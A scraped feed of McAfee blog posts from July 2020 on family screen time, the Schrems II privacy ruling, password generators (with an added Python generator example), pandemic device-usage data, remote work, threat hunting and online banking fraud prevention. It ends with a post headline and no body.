Both adults and kids use television, tablets, and smartphones more these days for both school and entertainment. According to a study by Axios, children’s screen time during the pandemic is surging by as much as 50 to 60 percent, putting screen time for children 12 and younger at nearly five hours or more per day. Another study in the Journal of Medical Internet Research indicates people’s mental health has worsened during the Coronavirus.

Priority: Family Wellbeing

It’s clear this season has impacted all ages in myriad ways and put the spotlight on the importance of digital and mental health. Here are some resources and tips to help strengthen both.

Keep structure intact. Experts agree that establishing a daily structure is the best way to keep family life as healthy as possible right now. Scheduling set times for learning, chores, exercise, mealtimes, screen time, and connecting with peers in online hangouts is essential. Safe Online: Establishing structure may be easier with software that also helps limit screen time, monitor activity, and filter apps and websites.

Clarify the news. Kids pick up on everything, both true and untrue. They often collect bits and pieces of “news” from TV, overhearing adults, or fragments of stories from peers, all of which can increase anxiety. Safe Online: Parents can help ease the fear caused by misinformation by (age-appropriately) updating children with facts on current events and helping them understand the context of what they see online or on television. 

Encourage connection. Social distancing does not mean social isolation. If your child seems lonely or isolated, help pull them back into the mix. If they can’t meet in a safe, socially-distanced setting with friends face-to-face, allow extra time on Messenger Rooms or Zoom to group chat with peers or relatives. Safe Online: Keep kids safe by using privacy settings in video apps and always supervise young children. 

Keep device use in check. Yes, we’re all on devices more, but that doesn’t greenlight a device free-for-all. Balance (pandemic or not) is always the aim of managing digital and mental health. Consider putting away devices during mealtime and before bedtime, and even challenge each other to go phone- and screen-free one full day a week. Safe Online: Check your phone usage stats on your devices daily or use software to track it for you.

Get moving. Squeezing in even 15-30 minutes of exercise a day alters our biochemical and hormonal balance and reduces mood swings, fatigue, anxiety, and feelings of hopelessness. Safe Online: If you use mobile fitness apps, maximize your privacy settings and read the app terms to understand how the app tracks your health data.

Parent self-care. “You can’t pour from an empty cup,” is a simple but powerful sentiment these days. Unplugging, turning off the news, and resting or meditating can turn a stressful day around. Safe Online: Minimize scrolling mindlessly online or engaging in online conflict. Modeling balanced digital habits is self-care and is a powerful way to help your child do the same. 

Family Resources Online

Consider online resources. To meet the demand of families at home, most insurance plans now offer online counseling. Also, surprisingly, Instagram is becoming a mental health hub. As worry continues around finances, job loss, health, and the impact of isolation, meeting with a counselor or therapist one-on-one online may be an easy, useful solution. To get started, do a hashtag search for #FamilyCounseling #Marriage #Counselling #Therapy #Stress #Anxiety or a profile search with the same keywords. Safe Online: Vet online counselors and therapists to make sure they are licensed and not part of an online scam.

MHA resources. Mental Health America has compiled an impressive range of resources and information for people in need of services such as domestic and child abuse, drug and alcohol issues, financial issues, suicide, depression, and LGBTQ issues. The site houses endless blogs and on-demand webinars specific to Coronavirus and family mental health issues.

As this season of uncertainty continues, it’s important to remember you are not alone. Everyone is feeling all the feelings, and no one has things like structure and balance mastered. But, we’re all getting wiser each day simply by committing to protecting the things that matter most.

The post Ways to Strengthen Your Family’s Digital and Mental Wellbeing appeared first on McAfee Blogs.

The Schrems II Decision: The Day After https://www.mcafee.com/blogs/enterprise/data-security/the-schrems-ii-decision-the-day-after/ Fri, 17 Jul 2020 22:30:35 +0000


This blog is for information purposes only and it does not constitute legal advice or advice on how to achieve operational privacy and security or compliance with laws or regulations.

The European Court of Justice (“CJEU”) yesterday invalidated the Privacy Shield, an agreement between the European data regulators and the U.S. Chamber of Commerce created in 2016 that allows businesses in the European Union to transfer data to the U.S. The Court said Privacy Shield, which is used by more than 5,000 companies (though not McAfee), does not comply with European privacy rights.

The decision is seen as one of the most important international privacy cases in recent history and arose from a complaint against Facebook brought to the Irish Data Protection Commissioner by Max Schrems.

Schrems has been challenging the transfer of his data (and the data of EU citizens generally) to the United States by Facebook, which has its European base in Ireland. His first case (“Schrems I”) led the Court in 2015 to invalidate the Safe Harbor arrangement, a prior arrangement governing data transfers from the EU to the US. The Safe Harbor scheme was replaced by the EU-US Privacy Shield on July 12, 2016, in response to the case.

The Court gave two major reasons for its decision (“Schrems II”) that the European Commission was wrong to say the Privacy Shield adequately protected the data of EU residents. The Court said that:

  • U.S. surveillance programs are not limited to what is strictly necessary and proportional and hence do not meet the requirements of Article 52 of the EU Charter on Fundamental Rights;
  • EU data subjects lack actionable judicial redress with regards to U.S. surveillance, and, therefore, do not have a right to an effective remedy in the U.S., as required by Article 47 of the EU Charter.

Additionally, the CJEU ruled that:

  • Standard Contractual Clauses (“SCCs”), which are currently being reviewed by the European Commission, and Binding Corporate Rules (“BCRs”) remain valid mechanisms for transferring data outside of the European Union;
  • BUT companies must verify, on a case-by-case basis, whether the law in the recipient country ensures adequate protection, under EU law, for personal data transferred under SCCs and, where it doesn’t, companies must provide additional safeguards or suspend transfers. The ruling placed the same requirement on EU data protection authorities to suspend such transfers on a case-by-case basis where equivalent protection cannot be ensured.

We’ve started hearing some myths that need debunking:

  • Myth 1: Keeping data in Europe is the ONE solution. Well no, it isn’t. The internet is Global, the Cloud is global and data localization may not prevent the application of the U.S.’s Cloud Act;
  • Myth 2: The U.S. will need to change its laws: Not so fast! This may help, but will take some time, and to meet what the Court wants will require changes both to the Patriot Act and a new means of recourse – no small ask of a U.S. Congress even when the House and the Senate are working well together, much less in the middle of a pandemic with a lot of political divisiveness;
  • Myth 3: This only concerns the U.S. Nope, government surveillance (and secretive surveillance) exists almost everywhere – and is necessary, including in the European Union and in some of the jurisdictions that the EU has said have adequate protections.  This ruling could open the door for many uncomfortable conversations with jurisdictions that have thought they were safe in the past.
  • Myth 4: The ruling says that European companies must stop using U.S. service providers, especially Cloud service providers. No, that’s again bashing multinational corporations which abide by the strictest security standards.

From a practical standpoint, what are the changes?

  • Companies that used to transfer data under the Privacy Shield should consider signing SCCs and may want to think about a project to put in place BCRs;
  • SCCs may need to be amended to add additional language to provide additional safeguards when faced with access requests by public authorities around the world.

What does this mean for McAfee customers? McAfee is committed to adhering to the applicable laws. We are glad to sign SCCs with customers. We have done a lot of work to make sure that our products were ready for the GDPR, and continue to track the regulatory and judicial changes. We’re glad to talk to you about this and other issues, contact us here.


The post The Schrems II Decision: The Day After appeared first on McAfee Blogs.

Create Strong Passwords with a Password Generator https://www.mcafee.com/blogs/consumer/create-strong-passwords-with-a-password-generator/ Fri, 17 Jul 2020 19:59:35 +0000
Create Strong Passwords with a Password Generator

Whether you use the internet for several hours every day or only browse it on occasion, you have likely created numerous accounts on streaming services, financial services, and online storefronts like Amazon. Many of these accounts contain highly sensitive information. Hackers can get into online accounts and computers by guessing passwords, which means that your personal information would be available to them if you use a weak password.

To effectively protect your accounts from being hacked, it’s important that you have a strong password for each account that you create. However, it can be difficult to think of the perfect password that will keep your account safe from any hacker. To that end, there are many ways to create strong passwords, the most straightforward of which is a password generator. This article goes into detail about the importance of using good passwords and how to create them.

Importance of Having a Strong Password

Whenever you purchase an item online, you will be required to enter some financial information, which can include your bank account or credit card number. Many individuals may make the mistake of saving their financial information to the account because of how convenient it is. When you need to purchase an item in the future, you won’t need to go through the hassle of reentering your credit card information. The problem with saving your financial info to your account is that hackers who get into your account will have automatic access to the information at hand.

Website Security Measures Also Benefit from Strong Passwords

While website security has become increasingly strong over the past decade or so, the security measures that a site owner takes don’t matter if a hacker is able to get into your account by guessing your password, which is why it’s essential that you create a strong password that will hold up to hacking attempts.

Weak Passwords can Lead to Many Problems

Without a strong password, you run the risk of experiencing identity theft or financial fraud, both of which can significantly damage your finances and livelihood if the issue isn’t corrected immediately. Keep in mind that some of the more popular passwords in the country include 123456, password, 111111, qwerty, and abc123. Because of how popular these passwords are, they are some of the first that hackers will use to attempt to get into an account.

Hackers Can Control Your Entire Account

Once a hacker has breached your account, they can do a variety of things, the primary of which involves acquiring financial information that can be found in your account. These individuals can also choose to make purchases with this account or send in requests for new credit cards under your name. Along with stealing your own money, it’s possible for hackers to ruin your credit, which could take years to remedy.

Hackers Could Breach Your Computer

It’s important to understand that hackers can also get into your computer. Though more difficult, hackers can access documents and personal information on your computer if they are able to guess the password to your operating system. Many people store the passwords that they use in a document that’s stored on their computer, which is done with the belief that a hacker will never get into the computer itself. In the event that a hacker gains access to your device, they would be able to read the document where your passwords are stored. While having a strong password doesn’t eliminate the possibility of being hacked, it will make it much more difficult for someone to gain access to your computer or online accounts.

Using a Password Generator

If you need to store important personal or financial information online or on your computer, it’s essential that you pair your devices and accounts with strong passwords that will hold up to hacking attempts. Even though you can create lengthy and strong passwords without any assistance, keep in mind that the average U.S. citizen has around 25-30 accounts that passwords are needed for. Attempting to identify the perfect password on your own and for each account that you create can be a time-consuming and laborious process. Password generators are designed to instantly provide you with passwords that should be very difficult to guess.

How Password Generators Work

While every password generator is somewhat unique, the best generators are ones that provide you with options on what you would like to include in the password. The majority of password generators will automatically create passwords that are at least 15 characters long, consist of symbols and numbers, and include uppercase and lowercase letters. However, certain generators also provide users with the ability to exclude similar and ambiguous characters from the password that’s generated. Once you have generated a password, all that’s left is for you to input it into the account you’re currently creating. Password generators are simple to use and can make your life easier as you attempt to keep your personal information safe and secure.
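As an added example (not True Key or any other McAfee code), here is a generator built the way the paragraph above describes: a configurable length defaulting to 15, at least one character guaranteed from each of the four classes, and an option to leave out look-alike characters. The symbol set and the look-alike list are assumptions, and it draws from Python’s `secrets` module so the output is not predictable.

```python
"""Password generator with the options the post describes: configurable length
(15 by default), all four character classes guaranteed, and optional exclusion
of ambiguous look-alike characters. Added example, not McAfee code."""
import math
import secrets
import string

# Characters easy to confuse on screen or in print (constructed list, an assumption).
AMBIGUOUS = set("Il1O0o")

# Character classes to draw from; the symbol set is an assumption.
CLASSES = {
    "lower": string.ascii_lowercase,
    "upper": string.ascii_uppercase,
    "digit": string.digits,
    "symbol": "!@#$%^&*()-_=+[]{};:,.?/",
}


def build_pools(exclude_ambiguous: bool) -> dict:
    """Return the per-class pools, minus look-alike characters when requested."""
    return {
        name: [c for c in chars if not (exclude_ambiguous and c in AMBIGUOUS)]
        for name, chars in CLASSES.items()
    }


def generate_password(length: int = 15, exclude_ambiguous: bool = True) -> str:
    """Return a random password of `length` characters containing at least one
    character from every class. Uses the OS CSPRNG via `secrets`."""
    if length < len(CLASSES):
        raise ValueError("length must allow one character from each class")
    pools = build_pools(exclude_ambiguous)
    combined = [c for pool in pools.values() for c in pool]
    # One guaranteed pick per class, then fill the rest from the combined pool.
    picks = [secrets.choice(pool) for pool in pools.values()]
    picks += [secrets.choice(combined) for _ in range(length - len(picks))]
    # Shuffle with the CSPRNG so the guaranteed picks are not always at the front.
    secrets.SystemRandom().shuffle(picks)
    return "".join(picks)


def entropy_bits(length: int = 15, exclude_ambiguous: bool = True) -> float:
    """Approximate entropy of a generated password: log2(alphabet) per character.
    The guaranteed-class constraint trims this slightly, so it is an upper bound."""
    alphabet = sum(len(pool) for pool in build_pools(exclude_ambiguous).values())
    return length * math.log2(alphabet)


def uses_all_classes(password: str) -> bool:
    """True when the password contains at least one character from each class."""
    return all(any(ch in chars for ch in password) for chars in CLASSES.values())


def contains_ambiguous(password: str) -> bool:
    """True when the password contains any look-alike character."""
    return any(ch in AMBIGUOUS for ch in password)


if __name__ == "__main__":
    pw = generate_password()
    print(pw, len(pw), uses_all_classes(pw), f"{entropy_bits():.1f} bits")
```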

Extra Features to Look For in Password Generator

Password generators can come with many extra features that could prove helpful in keeping your accounts and computer secure. For instance, some services provide users with a master password, which means that all of your passwords and secure information are kept under a single password that only you know. Some tools also allow users to set the exact length of the password, which could consist of anywhere from 8-100 characters. Additional features to be on the lookout for include unlimited password storage, 24/7 support, and custom security controls.

McAfee True Key Features

One potential password manager and generator you can use is McAfee True Key, which is designed to create very lengthy and strong passwords. Some of the core features of this particular tool include local data encryption, the support of numerous browsers, syncing across PC, Mac, iOS, and Android devices, and many different methods for signing in. For instance, you could pair the True Key app with the fingerprint reader on your device. You can also use the app to import any stored passwords from your browser.

How to Create a Strong Password

There are myriad things that you can do to create a strong password, the easiest of which is to use a password generator that will automatically provide you with a randomized password that will hold up well to hackers. While using a password generator is the most convenient option for creating a strong password, there are some additional tips and guidelines that you should keep in mind.

Primary Guidelines for Creating a Great Password

The main guidelines to keep in mind when creating a strong password include:

  • Make sure that your password is at least 7-8 characters long
  • Make sure that you never use a word or symbol for your password that can easily be found on any of your social media pages
  • Change each password you use at an interval of 90 days or less, which should also be done for any strong passwords you use
  • Use a combination of numbers, special characters, uppercase letters, and lowercase letters
  • Don’t use the same password for numerous accounts, which heightens the possibility that a breach into one of your accounts could lead to several accounts being compromised
  • Never write down your password on a piece of paper, which only serves to heighten the possibility of the password being seen by another individual and copied down
  • Consider using numbers and letters for your password that have no identifiable patterns within

Stay protected

Passwords are essential for security and can help you keep your computer and online accounts safe from hackers. While financial fraud and cases of stolen identity may be able to be corrected without any lasting damage to your bank account or credit score, the hassle that comes with contacting banking institutions and fixing any issues pertaining to the hack is more than it’s worth. Even though the aforementioned tips should assist you in creating a strong password, it’s highly recommended that you use a password generator instead, which ensures that mistakes are avoided completely and that the passwords you use are secure.

The post Create Strong Passwords with a Password Generator appeared first on McAfee Blogs.

Devices and Distancing: What Digital Data Says About Life From Home https://www.mcafee.com/blogs/consumer/devices-and-distancing/ Tue, 14 Jul 2020 16:29:49 +0000 /blogs/?p=102637


Devices and Distancing: What Digital Data Says About Life From Home

With millions of us keeping life closer to home in these past months, what can our devices and apps tell us about how we’ve passed that time? Plenty.

Usage stats, location data, app downloads, and daily active users, all drawn from anonymized data, are all common statistics that get reported on a regular basis. What makes them particularly insightful this year is to see how they’ve increased, decreased, or remained steady as nations and communities have put distancing measures in place. How are we living differently and what role are our devices playing in them?

That’s a rather large question, and different data sets, measurements, and methodologies will point to different insights. However, looking at a few of them together can help us associate some figures with the way our day-to-day experience has changed and continues to evolve.

Our own data shows people are using their desktop and laptop computers more

Using the McAfee PC app, which is always running in the background protecting our customers, we’re able to look at general PC use. The inference here is that increased use of a desktop or laptop PC (especially during weekdays) indicates an uptick in people engaging in remote work, learning, or play. Our figures are drawn from pseudonymized or anonymized device records aggregated to a country level, with at least 1,000 devices counted.

What did our numbers specifically show? You can visit our Safer Together page and take a country-by-country view of the data, which starts in February. (See our interactive heat map at the bottom of the page.) A quick capsule summary of select nations is below:

PC Usage by Month


Unsurprisingly, the most marked jump in home PC use occurs during the stretch that measures March to April, which marks the period when stay-at-home guidance rolled into place for many. From there, those increases held relatively steady. Looking at the change from April to May, it appears that people largely stayed at home as well.

Beyond that, June’s week-by-week trends saw usage in Australia and India both increase steadily. The U.S., UK, and Germany also trended upward overall, while France and Italy trended downward.

Other apps and technologies point to other trends

Dating apps saw a big spike in downloads and usage during the same stretch of time. According to dating app Bumble, the end of March saw an 84% increase in the number of its video calls and voice chats. On March 29th, the Tinder dating app reported the highest number of swipes ever in one day up to that point—some 3 billion. As we shared in an article earlier this year about safely dating from home, perhaps this shouldn’t come as any surprise because dating apps are designed to bring people together. In periods of isolation, it follows that people would use them to reach out and make connections where they can.

There’ve been plenty of similar stories (and some surprises) in the news in recent weeks, as various firms, publications, and service providers share some of the digital trends they’ve spotted, such as:

  • In April, online analysis firm Apptopia reported a marked decrease in mobile phone screen time and an increase in time on desktop browsers as people switched to bigger screens. They also tracked a major spike in the download of home improvement retailer apps in the U.S., such as Lowe’s, Home Depot, and Menards—up 69% year-over-year.
  • PC Magazine reports that internet usage surged 47% in January-March of this year. One statistic that underscores this increase is the percentage of people who consume more than 1TB of data in a month. This went from 4.2% of subscribers in the start of 2019 to 10% in the first quarter of 2020. That’s a more than 2x increase in so-called power users.
  • The same report shared further insights, such as collaboration tool Microsoft Teams setting a record for 2.7 billion meeting minutes in a single day and collaboration platform Slack seeing an 80% increase in paid customers over the previous quarter. Likewise, video conferencing tool Zoom saw its daily participants increase by 2,900% in the quarter compared to December 2019.
  • OpenTable, which provides online restaurant reservations across nearly 60,000 restaurants globally and seats 134 million diners monthly, has put out its own data as well. Its “State of the Restaurant Industry” figures offer few surprises as to how hard-hit restaurants around the world have been. By making week-to-week comparisons between 2019 and 2020, it shows that seatings in early June are down roughly 75% globally compared to last year. Later in the month, they are still down 63% compared to the same time last year.


Looking ahead: more working from home?

While these statistics each provide their own snapshot of life during lockdown in retrospect, what remains to be seen is how the time we’ve spent at home will shape the way we work, learn, socialize, and entertain ourselves in the months to come. At least right now, it seems that people are wanting or expecting to see change. A new study from McAfee surveyed 1,000 working adults in the U.S. between the ages of 18 and 74 in May 2020 and found that nearly half (47%) of employees do not want to go back to working how they were before stay-at-home measures were put in place.

However that plays out in the future, it’s important to protect ourselves today while we continue to rely on our devices so heavily. Comprehensive security protection, like McAfee Total Protection, can help protect devices against malware, phishing attacks, and other threats. Additionally, it includes McAfee WebAdvisor that can help identify malicious websites.

And one last stat: according to Nielsen, there was an 85% increase in American streaming rates in the first three weeks of March this year compared to March 2019 reports. Again, no surprise. Yet one thing to be on the lookout for is phishing and malware attacks associated with movies and shows that are offered for a “free” stream or download. It’s a common method of attack, and we’ve compiled our Top 10 U.S. List of TV and Movie Titles That Could Lead You to a Dangerous Download. Give the article a look. Not only does it name the titles, it offers you great advice for keeping safe.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


The post Devices and Distancing: What Digital Data Says About Life From Home appeared first on McAfee Blogs.

How to Adopt a Work-from-Home Mindset https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/how-to-adopt-a-work-from-home-mindset/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/how-to-adopt-a-work-from-home-mindset/#respond Tue, 14 Jul 2020 15:24:03 +0000 /blogs/?p=102556


By: Paige, Change Management Manager, Plano, TX, United States

In the last few months, navigating through the pandemic has yielded changes in every aspect of our daily lives.  Because of COVID-19, many companies have suddenly moved to full remote work. My husband and I received news about this and school closings while our family was on spring break.

As you guessed, we weren’t exactly ready to dive into all the rapid changes—even as seasoned remote workers. Being an active member of McAfee’s Virtual Culture Club (VCC), a group that brings global remote team members together, I made sure to incorporate what I’ve learned from these connections.

Now that I’ve spent significant time managing work and three boys from home, here are my four remote work adoption tips for parents who are also playing educator like me.

Tip No. 1: Schedule Breaks

Before the pandemic, I preferred to work through lunch, so I could attend my children’s soccer and tennis games, volunteer or take over for my husband who manages school pickup, starts the kids on homework and prepares dinner. We had a pretty good routine and it worked well for us.

In our new norm, there is no such thing as a routine anymore. We had to become comfortable with that. In my work schedule, meetings with varied times are constant for me since my role supports business in different places around the globe. At the start of the pandemic, our children transitioned to online classes, which also occur at different times and days each week.

The change in routine and moving schedules took a while to become familiar with. I had to start blocking out time to fit in preparing lunch for the kids, eating meals and making time for a short walk around the neighborhood to get out and feel the sun. Once I started doing that, I felt so much lighter.

Plan breaks away from your computer and make space to get energy out with your family.

Tip No. 2: Allow Your Professional and Personal Life to Collide

Our professional and personal lives occupy the same space now. I believe you can still manage both successfully. Though having a dedicated office space to work is necessary, I encourage you to let your kids pull up a chair to draw, craft or even read a book alongside you. This will help reduce any pressure you may have about balancing your time as a parent. Sometimes, our children just want to be near us.

Recently, McAfee hosted an Online Safety Session series virtually on Facebook, where cybersecurity experts shared knowledge and best practices with parents, teachers and kids to stay safe online. I was able to invite my oldest child to sit next to me, so we could watch it together. It was a win-win—a learning opportunity for her, a way to inspire them with my career space and a chance to spend time together.

When possible, find opportunities to break up your work day with positive family interactions.

Tip No. 3: Sprinkle in a Little Joy

A few months ago, my youngest child, who is a preschooler, started to practice writing on sticky notes and handing them to me while I was working. I’d smile, thank him and put the notes to the side of my laptop. Dissatisfied with my placement, he would quickly put the note on top of my laptop and make sure it stayed on there with extra tape every time I stepped away. Now, every time I close my laptop and see his note, it brings me great joy.

There are many ways to add joy in your day when you work from home:

  • Take a selfie with something that caught your attention on your lunch walks and send it to your team
  • Treat yourself to a food delivery you’re craving with no judgment
  • Play your favorite song loudly between meetings

Make time for the smallest joys that make you happy every day.

Tip No. 4: Remember: Change is Hard, Empathy isn’t

As a change manager, I know firsthand that change is hard. Change is expected. And throughout my career experiences, I’ve learned that change is constant. It’s also okay to feel what you are feeling. We need to have grace for one another when there is an occasional interruption from kids or even pets. If you can be a great worker in the office, you can be a great worker at home.

During video conference calls, sometimes my kids enjoy making cameo appearances so they can see my teammates. My teammates, and especially my leader, always reassure me, “Paige, do not worry about it. It’s totally fine.” Now, when we have extra time at the end of a team meeting, we introduce our kids, pets or partners.

Remember, we are all in this together, globally. We are all adjusting.

If you’re looking at new opportunities in a thriving culture that will provide you with balance and flexibility, search McAfee’s current openings.

The post How to Adopt a Work-from-Home Mindset appeared first on McAfee Blogs.

Time to Get Proactive About Threat Hunting https://www.mcafee.com/blogs/enterprise/security-operations/time-to-get-proactive-about-threat-hunting/ https://www.mcafee.com/blogs/enterprise/security-operations/time-to-get-proactive-about-threat-hunting/#respond Mon, 13 Jul 2020 18:38:50 +0000 /blogs/?p=102601


When I think about the many challenges that threat hunters face nowadays, trust me when I say that I feel their pain. Early in my career, I was a Security Engineer in a SOC who scrambled into action upon receiving the proverbial midnight call about an incident.

The system I was part of wasn’t perfect, as we were always one step behind our adversaries. Still, we held the line by deploying an assortment of security technologies to minimize any damage. Enterprises essentially adopted a reactive “whack-a-mole” approach, where defenders would address one-off vulnerabilities as they popped up. But we face a new cyber security landscape that makes it clear we need to adopt a new, more proactive approach to threat hunting.

Are We a Target? 

In the past, cyber security was generally treated as an afterthought by senior management. No longer. Company boards are finally attuned to the grave challenge that cyber security poses to their businesses. While boards are willing to make cyber security investments, they also want to make sure they’re getting the maximum return from investments in the tools that CISOs say they need.   

However, they’re not going to be patient if their cyber security strategy still rests upon waiting for the next phishing email to infect the network before defenders start to swing into action. Enterprises don’t have the luxury, especially not in the current threat landscape where they are being targeted by cohorts of increasingly sophisticated attackers. This has implications for everyone involved in the enterprise cyber security chain – from the CISO to the most junior analyst on the SOC team.  

Threat hunters must be able to synthesize external threat feeds and data into useful context to know whether the organization is a target. They also need actionable information to take steps that bolster the organization’s overall security posture; this can involve anything from ordering a general lockdown to tweaking policies that better secure endpoints or the web gateway.

Unfortunately, this proactive capacity still remains out of reach for most companies. Fewer than 20% of breaches are getting stopped in a timely fashion because threat hunters lack the tools that might supply the kind of timely, actionable context I’m talking about. 

Boards aren’t going to be patient if their threat hunting approach is the equivalent of calling in the firemen only after the blaze starts. The organization needs to know ahead of time what’s happening in their cyber neighborhood, not after the fact. 

The Rise of the Strategic Threat Hunter 

That puts added pressure on threat hunters to get ahead of the problem before it’s a problem. As the average cost of data breaches continues to climb, too much is at risk by keeping the status quo. Remediation and resolution after the fact no longer cuts it. But if threat hunters know ahead of time who is being targeted and what endpoints are going to be impacted, that’s a game-changer. At that point, they can take proactive measures to protect their organizations.

At McAfee, our portfolio of technologies not only extends protection across all endpoints and the cloud but also streamlines the process of investigation, allowing threat hunters to drill down across vectors, industries and regions. We cross-correlate known campaigns using industry and geographical threat activity with an organization’s own endpoint security posture derived from its security telemetry.   

That’s a major boon for threat hunters, who now can glean accurate insights into the constellation of potential security risks. They no longer need to manually pick through disparate pieces of data, separating out false positives from real indications of trouble. So, instead of wasting precious time on busy work, they apply their talents to the task of finding the most effective way to deal with incoming threats.

Even on a good day, the threat hunter’s job is hard enough. Without the necessary information to help understand the bigger picture, it looks more like Mission Impossible. But with the recently announced, uniquely proactive MVISION Insights in hand, threat hunters can finally flip the script to take the fight to the bad guys. Remember: the best defense is always a good offense.

Check it out—our Chief Scientist Raj Samani weighs in on MVISION Insights.

The post Time to Get Proactive About Threat Hunting appeared first on McAfee Blogs.

Online Banking—Simple Steps to Protect Yourself from Bank Fraud https://www.mcafee.com/blogs/consumer/online-banking-simple-steps-to-protect-yourself-from-bank-fraud/ https://www.mcafee.com/blogs/consumer/online-banking-simple-steps-to-protect-yourself-from-bank-fraud/#respond Mon, 13 Jul 2020 17:51:06 +0000 /blogs/?p=102613


Online Banking—Simple Steps to Protect Yourself from Bank Fraud

Even if you’re not big on online banking, online banking is big on you. Online banking is well on its way to becoming a cornerstone of the banking experience overall. More and more transactions occur over the internet rather than at a teller’s window, and nearly every account has a username, password, and PIN associated with it. Whether you use online banking regularly or sparingly, you can protect yourself from being the victim of fraud by following a few straightforward steps.

Online banking is growing, and here to stay

First off, online banking is no longer a novelty. It hasn’t been for some time. In fact, it’s now an expectation. As recently as 2018, a global survey from Deloitte found that 73% of consumers use online banking at least once a month and 59% of respondents use mobile banking apps—a number which has only increased since then. Looking yet more broadly, the country of Sweden is on track to become the world’s first cashless society by 2023. While the rest of the world may not be scrambling to forgo cash altogether, we can look at point-of-sale data and see that more and more people are going cashless with even their smallest of transactions.

Here’s how you can protect yourself from online banking fraud

There’s no doubt about it. We live in a world where banking, shopping, and payments revolve around a username and password. That’s quite a bit to take in, particularly if your first experiences with banking involved walking into a branch, getting a paper passbook, and maybe even a free toaster for opening an account.

So, how do you protect yourself? Consider the following:

Use a strong password—and a password manager to keep them straight

Start here. Passwords are your first line of defense. However, one thing that can be a headache is the number of passwords we have to juggle—a number that seems like it’s growing every day. Look around online and you’ll see multiple studies and articles stating that the average person has upwards of 80 to manage. Even if you have just a small percentage of those, strongly consider using a password manager. A good choice will generate strong, unique passwords for each of your accounts and store them securely for you.

In general, don’t use simple passwords that people can guess or easily glean from other sources (like your birthday, your child’s birthday, the name of your pet, and so on). Additionally, make them unique. Don’t repeat their use from account to account. That’s a quick way to see one hack lead to many others.

Use two-factor authentication to protect your accounts

What exactly is two-factor authentication? It’s an extra layer of defense for your accounts. In practice, it means that in addition to providing a password, you also receive a special one-time-use code to access your account. That code may be sent to you via email or to your phone by text. In some cases, you can also receive that code by a call to your phone. Basically, two-factor authentication combines two things: something you know, like your password; and something you have, like your smartphone. Together, that makes it tougher for scammers to hack into your accounts.

Two-factor authentication is practically a standard, so much so that you already might be using it right now when you bank or use certain accounts. If not, you can see if your bank offers it as an option in your settings the next time you log in. Or, you can contact your bank for help to get it set up.

Avoid phishing attacks: Look at your email inbox with a skeptical eye

Phishing is a popular way for crooks to steal personal information by way of email, where a crook will look to phish (“fish”) personal and financial information out of you. No two phishing emails look alike. They can range from a request from a stranger posing as a lawyer who wants you to assist with a bank transfer—to an announcement about (phony) lottery winnings, “Just send us your bank information and we’ll send your prize to you!” Those are a couple of classics. However, phishing emails have become much more sophisticated in recent years. Now, slicker hackers will pose as banks, online stores, and credit card companies, often using well-designed emails that look almost the same as the genuine article.

Of course, those emails are fakes. The links embedded in those emails lead you to the crooks—not the legitimate organization they claim to be—for the purpose of stealing personal info or directing a payment their way. Telltale signs are if the phishing email is sent from an address that slightly alters the brand name or adds to it by simply tacking extra language onto the end of it. If you get one of these emails, don’t click any of the links. Contact the institution in question yourself using a phone number or address posted on their official website. This is a good rule of thumb in general. The best avenue of communication is the one you’ve used and trusted before.

Be skeptical about calls as well. Fraudsters use the phone too.

It may seem a little traditional, yet criminals still like to use the phone. In fact, they rely on the fact that many still view the phone as a trusted line of communication. This is known as “vishing,” which is short for “voice phishing.” The aim is the same as it is with phishing. The fraudster is looking to lure you into a bogus financial transaction or attempting to steal information, whether that’s financial, personal, or both. They may call you directly, posing as your bank or even as Microsoft tech support, or they may send you a text or email that directs you to call their number.

For example, a crook may call and introduce themselves as being part of your bank or credit card company with the word that “there are questions about your account” or something similar. In these cases, politely hang up. Next, call your bank or credit card company to follow up on your own. If the initial call was legitimate, you’ll quickly find out and can handle the issue properly. If you get a call from a scammer, they can be very persuasive. Remember, though. You’re in charge. You can absolutely hang up and then follow up using a phone number you trust.

Steer clear of financial transactions on public Wi-Fi in cafes, hotels, and libraries

There’s a good reason not to use public Wi-Fi: it’s not private. These are public networks, and that means they’re unsecured and shared by everyone who’s using them, which allows hackers to read any data passing along them like an open book. That includes your accounts and passwords if you’re doing any banking or shopping on one. The best advice here is to wait and handle those things at home if possible. (Or connect to the public Wi-Fi with a VPN service, which we’ll cover below.)
If not, you can always use your smartphone’s data connection to create a personal hotspot for your laptop, which will be far more secure. Another option is to simply use your smartphone alone. With a combination of your phone’s data connection and an app from your bank, you can take care of business that way instead of using public Wi-Fi. That said, be aware of your physical surroundings too. Make sure no one is looking over your shoulder!

Protecting your banking and finances even further

Some basic digital hygiene will go a long way toward protecting you even more—not just your banking and finances, but all the things you do online as well. The following quick list can help:

  • Update your software – That includes the operating system of your computers, smartphones, and tablets, along with the apps that are on them. Many updates include security upgrades and fixes that make it tougher for hackers to launch an attack.
  • Lock up – Your computers, smartphones, and tablets will have a way of locking them with a PIN, a password, your fingerprint, or your face. Take advantage of that protection, which is particularly important if your device is lost or stolen.
  • Use security software – Protecting your devices with comprehensive security software will defend you against the latest virus, malware, spyware and ransomware attacks, plus further protect your privacy and identity.
  • Consider connecting with a VPN – Also known as a “virtual private network,” a VPN helps you stay safer with bank-grade encryption and private browsing. It’s a particularly excellent option if you find yourself needing to use public Wi-Fi, because a VPN effectively makes a public network private.
  • Check your credit report – This is an important thing to do in today’s password- and digital-driven world. Doing so will uncover any inconsistencies or outright instances of fraud and put you on the path to setting them straight. In the U.S., you can do this for free once a year. Just drop by the FTC website for details on your free credit report.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Online Banking—Simple Steps to Protect Yourself from Bank Fraud appeared first on McAfee Blogs.

We’re Named 2020 Gartner Peer Insights Customers’ Choice for Enterprise DLP https://www.mcafee.com/blogs/enterprise/endpoint-security/were-named-2020-gartner-peer-insights-customers-choice-for-enterprise-dlp/ https://www.mcafee.com/blogs/enterprise/endpoint-security/were-named-2020-gartner-peer-insights-customers-choice-for-enterprise-dlp/#respond Tue, 07 Jul 2020 19:47:22 +0000 /blogs/?p=102580


